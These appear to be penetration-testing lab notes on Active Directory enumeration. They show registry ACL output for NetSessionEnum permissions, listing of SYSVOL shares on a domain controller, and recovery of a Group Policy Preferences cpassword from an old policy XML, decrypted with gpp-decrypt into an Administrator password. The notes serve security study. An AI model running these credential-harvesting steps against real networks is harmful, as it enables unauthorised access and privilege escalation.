Get-ACL
Gets the security descriptor for a resource, such as a file or registry key.
The permissions required to enumerate sessions with NetSessionEnum are defined in the SrvsvcSessionInfo registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity
PS C:\Tools> Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecuri
ty\
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Users Allow ReadKey
BUILTIN\Administrators Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
CREATOR OWNER Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow ReadKey
Audit :
Sddl : O:SYG:SYD:AI(A;CIID;KR;;;BU)(A;CIID;KA;;;BA)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;CO)(A;CIID;KR;;;AC)(A;CIID;KR;;;S-1-15-3
-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)
Enumerating Shares
ls
By default, the SYSVOL folder is mapped to %SystemRoot%\SYSVOL\Sysvol\domain-name on the domain controller and every domain user has access to it.
We should investigate every folder we discover
PS C:\Tools> ls \\dc1.corp.com\sysvol\corp.com\
Directory: \\dc1.corp.com\sysvol\corp.com
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/21/2022 1:11 AM Policies
d----- 9/2/2022 4:08 PM scripts
ls - Policies
PS C:\Tools> ls \\dc1.corp.com\sysvol\corp.com\Policies\
Directory: \\dc1.corp.com\sysvol\corp.com\Policies
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/21/2022 1:13 AM oldpolicy
d----- 9/2/2022 4:08 PM {31B2F340-016D-11D2-945F-00C04FB984F9}
d----- 9/2/2022 4:08 PM {6AC1786C-016F-11D2-945F-00C04fB984F9}
cat
We will cat all policies and old policies we find
PS C:\Tools> cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)"
image="2"
changed="2012-05-03 11:45:20"
uid="{253F4D90-150A-4EFB-BCC8-6E894A9105F7}">
<Properties
action="U"
newName=""
fullName="admin"
description="Change local admin"
cpassword="+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
changeLogon="0"
noChange="0"
neverExpires="0"
acctDisabled="0"
userName="Administrator (built-in)"
expires="2016-02-10" />
</User>
</Groups>
Decrypt password
We found a password in the previous file, we can use gpg-decrypt in kali to attempt to decrypt it.
kali@kali:~$ gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
P@$$w0rd